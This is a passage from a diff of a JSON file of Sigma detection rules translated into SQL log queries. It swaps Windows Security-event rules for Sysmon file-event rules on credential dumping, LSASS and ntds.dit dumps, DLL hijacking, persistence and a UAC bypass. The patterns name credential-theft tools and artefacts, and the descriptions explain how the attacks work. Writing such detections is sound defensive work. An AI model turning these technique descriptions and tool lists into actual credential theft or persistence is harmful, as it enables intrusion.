'%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - 